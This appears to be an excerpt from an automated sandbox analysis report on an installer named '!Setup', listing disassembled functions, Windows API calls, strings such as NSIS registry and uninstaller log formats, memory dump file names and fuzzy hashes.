Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

F, xrefs: 004042D3
N, xrefs: 00404298
open, xrefs: 0040430B

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

NUL, xrefs: 00406ACA
^F, xrefs: 00406ACF
%s=%s, xrefs: 00406B6F
plF, xrefs: 00406B54
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: c66772e8c78fc620be6d4cc5b43e883a49b8d8bdc18a99bb2091202eebcb1dd4
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
`G, xrefs: 0040246E

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 0040324C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00011E00,00000064,00E02F5F), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

_/, xrefs: 00403286
verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: _/$verifying installer: %d%%
API String ID: 1451636040-2916382291
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

